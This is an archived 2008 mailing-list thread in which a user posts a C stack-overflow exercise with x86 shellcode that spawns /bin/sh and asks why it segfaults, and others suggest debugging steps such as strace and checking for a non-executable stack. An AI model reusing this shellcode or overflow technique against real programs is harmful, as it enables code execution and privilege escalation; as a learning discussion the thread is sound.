* buffer overflow
@ 2008-03-11 6:08 Varun Chandramohan
2008-03-11 8:33 ` Patrik Båt, RTL
` (2 more replies)
0 siblings, 3 replies; 11+ messages in thread
From: Varun Chandramohan @ 2008-03-11 6:08 UTC (permalink / raw)
To: linux-c-programming
Hi all,
Can someone tell me whats is wrong with this program? All i
get is seg fault. Iam trying to create a stack overflow and exec a
shell. Somehow its not working. The system is x86 on linux.
gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
The Code:
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#if 0
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
#endif
char large_string[128];
int main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
memset(&buffer,0,sizeof(buffer));
for (i = 0; i < 32; i++)
*(long_ptr + i) = (long)&buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
^ permalink raw reply [flat|nested] 11+ messages in thread* Re: buffer overflow 2008-03-11 6:08 buffer overflow Varun Chandramohan @ 2008-03-11 8:33 ` Patrik Båt, RTL 2008-03-11 10:04 ` Patrik Båt, RTL 2008-03-11 18:32 ` vincent-perrier 2 siblings, 0 replies; 11+ messages in thread From: Patrik Båt, RTL @ 2008-03-11 8:33 UTC (permalink / raw) To: Varun Chandramohan; +Cc: linux-c-programming Hello, there was a long time since I coded some C, but maybe here is some help: strace ./test <-- use STRACE to see some more detail... Here is proboby your error... ----- CODE ----- for (i = 0; i < 32; i++) *(long_ptr + i) = (long)&buffer; ----- /CODE ----- ----- strace ----- execve("./test", ["./test"], [/* 36 vars */]) = 0 brk(0) = 0x804a000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4c000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=59381, ...}) = 0 mmap2(NULL, 59381, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f3d000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/i686/cmov/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300e\1"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1413540, ...}) = 0 mmap2(NULL, 1418864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7de2000 mmap2(0xb7f37000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED| MAP_DENYWRITE, 3, 0x155) = 0xb7f37000 mmap2(0xb7f3a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED| MAP_ANONYMOUS, -1, 0) = 0xb7f3a000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7de1000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7de16b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7f37000, 4096, PROT_READ) = 0 munmap(0xb7f3d000, 59381) = 0 --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++ Process 28060 detached ------ /strace ------ Kind regards Patrik BÃ¥t tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > Hi all, > > Can someone tell me whats is wrong with this program? All i > get is seg fault. Iam trying to create a stack overflow and exec a > shell. Somehow its not working. The system is x86 on linux. > gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > Copyright (C) 2006 Free Software Foundation, Inc. > This is free software; see the source for copying conditions. There is NO > warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > > > > The Code: > #include <stdio.h> > #include <string.h> > > char shellcode[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > #if 0 > char shellcode[] = > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > #endif > > char large_string[128]; > int main() { > char buffer[96]; > int i; > long *long_ptr = (long *) large_string; > memset(&buffer,0,sizeof(buffer)); > > for (i = 0; i < 32; i++) > *(long_ptr + i) = (long)&buffer; > > for (i = 0; i < strlen(shellcode); i++) > large_string[i] = shellcode[i]; > > strcpy(buffer,large_string); > } > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 6:08 buffer overflow Varun Chandramohan 2008-03-11 8:33 ` Patrik Båt, RTL @ 2008-03-11 10:04 ` Patrik Båt, RTL 2008-03-11 10:41 ` Varun Chandramohan 2008-03-11 18:32 ` vincent-perrier 2 siblings, 1 reply; 11+ messages in thread From: Patrik Båt, RTL @ 2008-03-11 10:04 UTC (permalink / raw) To: Varun Chandramohan; +Cc: linux-c-programming tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > Hi all, > > Can someone tell me whats is wrong with this program? All i > get is seg fault. Iam trying to create a stack overflow and exec a > shell. Somehow its not working. The system is x86 on linux. > gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > Copyright (C) 2006 Free Software Foundation, Inc. > This is free software; see the source for copying conditions. There is NO > warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > > > > The Code: > #include <stdio.h> > #include <string.h> > > char shellcode[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > #if 0 > char shellcode[] = > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > #endif > > char large_string[128]; > int main() { > char buffer[96]; > int i; > long *long_ptr = (long *) large_string; > memset(&buffer,0,sizeof(buffer)); > > for (i = 0; i < 32; i++) > *(long_ptr + i) = (long)&buffer; > > for (i = 0; i < strlen(shellcode); i++) > large_string[i] = shellcode[i]; > > strcpy(buffer,large_string); strcpy(large_string,buffer); //This is working tho... > } > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 10:04 ` Patrik Båt, RTL @ 2008-03-11 10:41 ` Varun Chandramohan 2008-03-11 12:04 ` Patrik Båt, RTL [not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com> 0 siblings, 2 replies; 11+ messages in thread From: Varun Chandramohan @ 2008-03-11 10:41 UTC (permalink / raw) To: RTL; +Cc: linux-c-programming Patrik Båt wrote: > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > >> Hi all, >> >> Can someone tell me whats is wrong with this program? All i >> get is seg fault. Iam trying to create a stack overflow and exec a >> shell. Somehow its not working. The system is x86 on linux. >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) >> Copyright (C) 2006 Free Software Foundation, Inc. >> This is free software; see the source for copying conditions. There is NO >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. >> >> >> >> The Code: >> #include <stdio.h> >> #include <string.h> >> >> char shellcode[] = >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; >> #if 0 >> char shellcode[] = >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; >> >> #endif >> >> char large_string[128]; >> int main() { >> char buffer[96]; >> int i; >> long *long_ptr = (long *) large_string; >> memset(&buffer,0,sizeof(buffer)); >> >> for (i = 0; i < 32; i++) >> *(long_ptr + i) = (long)&buffer; >> >> for (i = 0; i < strlen(shellcode); i++) >> large_string[i] = shellcode[i]; >> >> strcpy(buffer,large_string); >> > strcpy(large_string,buffer); > > //This is working tho... > Thanks for the reply, but this doesnt spawn a shell, does it? This simply avoids the sigsegv >> } >> >> -- >> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in >> the body of a message to majordomo@vger.kernel.org >> More majordomo info at http://vger.kernel.org/majordomo-info.html >> > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 10:41 ` Varun Chandramohan @ 2008-03-11 12:04 ` Patrik Båt, RTL 2008-03-11 12:12 ` ninjaboy [not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com> 1 sibling, 1 reply; 11+ messages in thread From: Patrik Båt, RTL @ 2008-03-11 12:04 UTC (permalink / raw) To: Varun Chandramohan; +Cc: linux-c-programming Yeah, maybe some hardcore c coder in here can help you more... My primary "tip of the day" was strace ;) tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan: > Patrik B책t wrote: > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > > > >> Hi all, > >> > >> Can someone tell me whats is wrong with this program? All i > >> get is seg fault. Iam trying to create a stack overflow and exec a > >> shell. Somehow its not working. The system is x86 on linux. > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > >> Copyright (C) 2006 Free Software Foundation, Inc. > >> This is free software; see the source for copying conditions. There is NO > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > >> > >> > >> > >> The Code: > >> #include <stdio.h> > >> #include <string.h> > >> > >> char shellcode[] = > >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > >> #if 0 > >> char shellcode[] = > >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > >> > >> #endif > >> > >> char large_string[128]; > >> int main() { > >> char buffer[96]; > >> int i; > >> long *long_ptr = (long *) large_string; > >> memset(&buffer,0,sizeof(buffer)); > >> > >> for (i = 0; i < 32; i++) > >> *(long_ptr + i) = (long)&buffer; > >> > >> for (i = 0; i < strlen(shellcode); i++) > >> large_string[i] = shellcode[i]; > >> > >> strcpy(buffer,large_string); > >> > > strcpy(large_string,buffer); > > > > //This is working tho... > > > Thanks for the reply, but this doesnt spawn a shell, does it? This > simply avoids the sigsegv > >> } > >> > >> -- > >> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > >> the body of a message to majordomo@vger.kernel.org > >> More majordomo info at http://vger.kernel.org/majordomo-info.html > >> > > > > -- > > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > > the body of a message to majordomo@vger.kernel.org > > More majordomo info at http://vger.kernel.org/majordomo-info.html > > > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html -- Med v채nlig h채lsning / Best regards RTL CODEHACK Netfilter Firewall http://rtl.codehack.se Patrik B책t Email rtl@codehack.se Phone +46 85 59 23 751 Cell +46 70 78 22 540 -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 12:04 ` Patrik Båt, RTL @ 2008-03-11 12:12 ` ninjaboy 2008-03-11 13:24 ` Varun Chandramohan 0 siblings, 1 reply; 11+ messages in thread From: ninjaboy @ 2008-03-11 12:12 UTC (permalink / raw) To: Patrik Båt, RTL; +Cc: Varun Chandramohan, linux-c-programming 2008/3/11, Patrik Båt, RTL <rtl@codehack.se>: > Yeah, maybe some hardcore c coder in here can help you more... > > My primary "tip of the day" was strace ;) > > > tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan: > > Patrik Båt wrote: > > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: > > > > > >> Hi all, > > >> > > >> Can someone tell me whats is wrong with this program? All i > > >> get is seg fault. Iam trying to create a stack overflow and exec a > > >> shell. Somehow its not working. The system is x86 on linux. > > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > > >> Copyright (C) 2006 Free Software Foundation, Inc. > > >> This is free software; see the source for copying conditions. There is NO > > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > > >> > > >> > > >> > > >> The Code: > > >> #include <stdio.h> > > >> #include <string.h> > > >> > > >> char shellcode[] = > > >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > > >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > > >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > > >> #if 0 > > >> char shellcode[] = > > >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > > >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > > >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > > >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > >> > > >> #endif > > >> > > >> char large_string[128]; > > >> int main() { > > >> char buffer[96]; > > >> int i; > > >> long *long_ptr = (long *) large_string; > > >> memset(&buffer,0,sizeof(buffer)); > > >> > > >> for (i = 0; i < 32; i++) > > >> *(long_ptr + i) = (long)&buffer; > > >> > > >> for (i = 0; i < strlen(shellcode); i++) > > >> large_string[i] = shellcode[i]; > > >> > > >> strcpy(buffer,large_string); > > >> > > > strcpy(large_string,buffer); > > > > > > //This is working tho... > > > > > Thanks for the reply, but this doesnt spawn a shell, does it? This > > simply avoids the sigsegv > > >> } Maybe stack is not executable? -- noone is alone. -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 12:12 ` ninjaboy @ 2008-03-11 13:24 ` Varun Chandramohan 0 siblings, 0 replies; 11+ messages in thread From: Varun Chandramohan @ 2008-03-11 13:24 UTC (permalink / raw) To: ninjaboy; +Cc: "Patrik Båt, RTL", linux-c-programming ninjaboy wrote: > 2008/3/11, Patrik Båt, RTL <rtl@codehack.se>: > >> Yeah, maybe some hardcore c coder in here can help you more... >> >> My primary "tip of the day" was strace ;) >> >> >> tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan: >> > Patrik Båt wrote: >> > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: >> > > >> > >> Hi all, >> > >> >> > >> Can someone tell me whats is wrong with this program? All i >> > >> get is seg fault. Iam trying to create a stack overflow and exec a >> > >> shell. Somehow its not working. The system is x86 on linux. >> > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) >> > >> Copyright (C) 2006 Free Software Foundation, Inc. >> > >> This is free software; see the source for copying conditions. There is NO >> > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. >> > >> >> > >> >> > >> >> > >> The Code: >> > >> #include <stdio.h> >> > >> #include <string.h> >> > >> >> > >> char shellcode[] = >> > >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" >> > >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" >> > >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; >> > >> #if 0 >> > >> char shellcode[] = >> > >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" >> > >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" >> > >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" >> > >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; >> > >> >> > >> #endif >> > >> >> > >> char large_string[128]; >> > >> int main() { >> > >> char buffer[96]; >> > >> int i; >> > >> long *long_ptr = (long *) large_string; >> > >> memset(&buffer,0,sizeof(buffer)); >> > >> >> > >> for (i = 0; i < 32; i++) >> > >> *(long_ptr + i) = (long)&buffer; >> > >> >> > >> for (i = 0; i < strlen(shellcode); i++) >> > >> large_string[i] = shellcode[i]; >> > >> >> > >> strcpy(buffer,large_string); >> > >> >> > > strcpy(large_string,buffer); >> > > >> > > //This is working tho... >> > > >> > Thanks for the reply, but this doesnt spawn a shell, does it? This >> > simply avoids the sigsegv >> > >> } >> > > Maybe stack is not executable? > > Nope, made sure it is.....removed all the execshield and ramdom vm space protection. :) -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
[parent not found: <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com>]
* Re: buffer overflow [not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com> @ 2008-03-12 4:28 ` Varun Chandramohan 0 siblings, 0 replies; 11+ messages in thread From: Varun Chandramohan @ 2008-03-12 4:28 UTC (permalink / raw) To: Alfeiks Kaänoken; +Cc: RTL, linux-c-programming Alfeiks Kaänoken wrote: > Hi, > sigsegv is ok for your code - it's points that you tried to access to the > non-process space - i.e. on wrong pointer address (the system don't care > where it is). > There are no stack overflow or something else, you can expect more > information via debugger, but > usually if you get a stack overflow with gdb - you can get unknown > backtrace. > > BTW, could you explain your target ? > > My intention was to create a classic buffer overflow as shown in many docs on the internet. But i believe that it doesnt work out of the box because of all the different compiler changes. So i need to know in my compiler how stack is organized so that i can create the overflow. Regards, Varun > On 11/03/2008, Varun Chandramohan <varunc@linux.vnet.ibm.com> wrote: > >> Patrik Båt wrote: >> >>> tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan: >>> >>> >>>> Hi all, >>>> >>>> Can someone tell me whats is wrong with this program? All >>>> >> i >> >>>> get is seg fault. Iam trying to create a stack overflow and exec a >>>> shell. Somehow its not working. The system is x86 on linux. >>>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) >>>> Copyright (C) 2006 Free Software Foundation, Inc. >>>> This is free software; see the source for copying conditions. There is >>>> >> NO >> >>>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR >>>> >> PURPOSE. >> >>>> >>>> The Code: >>>> #include <stdio.h> >>>> #include <string.h> >>>> >>>> char shellcode[] = >>>> >>>> >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" >> >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" >> >>>> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; >>>> #if 0 >>>> char shellcode[] = >>>> >>>> >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" >> >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" >> >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" >> >>>> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; >>>> >>>> #endif >>>> >>>> char large_string[128]; >>>> int main() { >>>> char buffer[96]; >>>> int i; >>>> long *long_ptr = (long *) large_string; >>>> memset(&buffer,0,sizeof(buffer)); >>>> >>>> for (i = 0; i < 32; i++) >>>> *(long_ptr + i) = (long)&buffer; >>>> >>>> for (i = 0; i < strlen(shellcode); i++) >>>> large_string[i] = shellcode[i]; >>>> >>>> strcpy(buffer,large_string); >>>> >>>> >>> strcpy(large_string,buffer); >>> >>> //This is working tho... >>> >>> >> Thanks for the reply, but this doesnt spawn a shell, does it? This >> simply avoids the sigsegv >> >> >>>> } >>>> >>>> -- >>>> To unsubscribe from this list: send the line "unsubscribe >>>> >> linux-c-programming" in >> >>>> the body of a message to majordomo@vger.kernel.org >>>> More majordomo info at http://vger.kernel.org/majordomo-info.html >>>> >>>> >>> -- >>> To unsubscribe from this list: send the line "unsubscribe >>> >> linux-c-programming" in >> >>> the body of a message to majordomo@vger.kernel.org >>> More majordomo info at http://vger.kernel.org/majordomo-info.html >>> >>> >> -- >> To unsubscribe from this list: send the line "unsubscribe >> linux-c-programming" in >> the body of a message to majordomo@vger.kernel.org >> More majordomo info at http://vger.kernel.org/majordomo-info.html >> >> > > > > -- To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 6:08 buffer overflow Varun Chandramohan 2008-03-11 8:33 ` Patrik Båt, RTL 2008-03-11 10:04 ` Patrik Båt, RTL @ 2008-03-11 18:32 ` vincent-perrier 2008-03-12 4:29 ` Varun Chandramohan 2 siblings, 1 reply; 11+ messages in thread From: vincent-perrier @ 2008-03-11 18:32 UTC (permalink / raw) To: Varun Chandramohan; +Cc: linux-c-programming This is bad: memset(&buffer,0,sizeof(buffer)); buffer is already the address of the space: memset(buffer,0,...); is what I would do This is bad too: for (i = 0; i < 32; i++) *(long_ptr + i) = (long)&buffer; and most certainly does not do what you want. On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote: > Hi all, > > Can someone tell me whats is wrong with this program? All i > get is seg fault. Iam trying to create a stack overflow and exec a > shell. Somehow its not working. The system is x86 on linux. > gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > Copyright (C) 2006 Free Software Foundation, Inc. > This is free software; see the source for copying conditions. There is NO > warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > > > > The Code: > #include <stdio.h> > #include <string.h> > > char shellcode[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/bin/sh"; > #if 0 > char shellcode[] = > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > #endif > > char large_string[128]; > int main() { > char buffer[96]; > int i; > long *long_ptr = (long *) large_string; > memset(&buffer,0,sizeof(buffer)); > > for (i = 0; i < 32; i++) > *(long_ptr + i) = (long)&buffer; > > for (i = 0; i < strlen(shellcode); i++) > large_string[i] = shellcode[i]; > > strcpy(buffer,large_string); > } > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > � > ^ permalink raw reply [flat|nested] 11+ messages in thread
* Re: buffer overflow 2008-03-11 18:32 ` vincent-perrier @ 2008-03-12 4:29 ` Varun Chandramohan 0 siblings, 0 replies; 11+ messages in thread From: Varun Chandramohan @ 2008-03-12 4:29 UTC (permalink / raw) To: vincent-perrier; +Cc: linux-c-programming vincent-perrier wrote: > This is bad: > memset(&buffer,0,sizeof(buffer)); > buffer is already the address of the space: > memset(buffer,0,...); is what I would do > > fine. > This is bad too: > for (i = 0; i < 32; i++) > *(long_ptr + i) = (long)&buffer; > > and most certainly does not do what you want. > > can you suggest something better to achieve this? > On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote: > >> Hi all, >> >> Can someone tell me whats is wrong with this program? All i >> get is seg fault. Iam trying to create a stack overflow and exec a >> shell. Somehow its not working. The system is x86 on linux. >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) >> Copyright (C) 2006 Free Software Foundation, Inc. >> This is free software; see the source for copying conditions. There is NO >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. >> >> >> >> The Code: >> #include <stdio.h> >> #include <string.h> >> >> char shellcode[] = >> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" >> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" >> "\x80\xe8\xdc\xff\xff\xff/bin/sh"; >> #if 0 >> char shellcode[] = >> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" >> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" >> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" >> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; >> >> #endif >> >> char large_string[128]; >> int main() { >> char buffer[96]; >> int i; >> long *long_ptr = (long *) large_string; >> memset(&buffer,0,sizeof(buffer)); >> >> for (i = 0; i < 32; i++) >> *(long_ptr + i) = (long)&buffer; >> >> for (i = 0; i < strlen(shellcode); i++) >> large_string[i] = shellcode[i]; >> >> strcpy(buffer,large_string); >> } >> >> -- >> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in >> the body of a message to majordomo@vger.kernel.org >> More majordomo info at http://vger.kernel.org/majordomo-info.html >> � >> >> > > ^ permalink raw reply 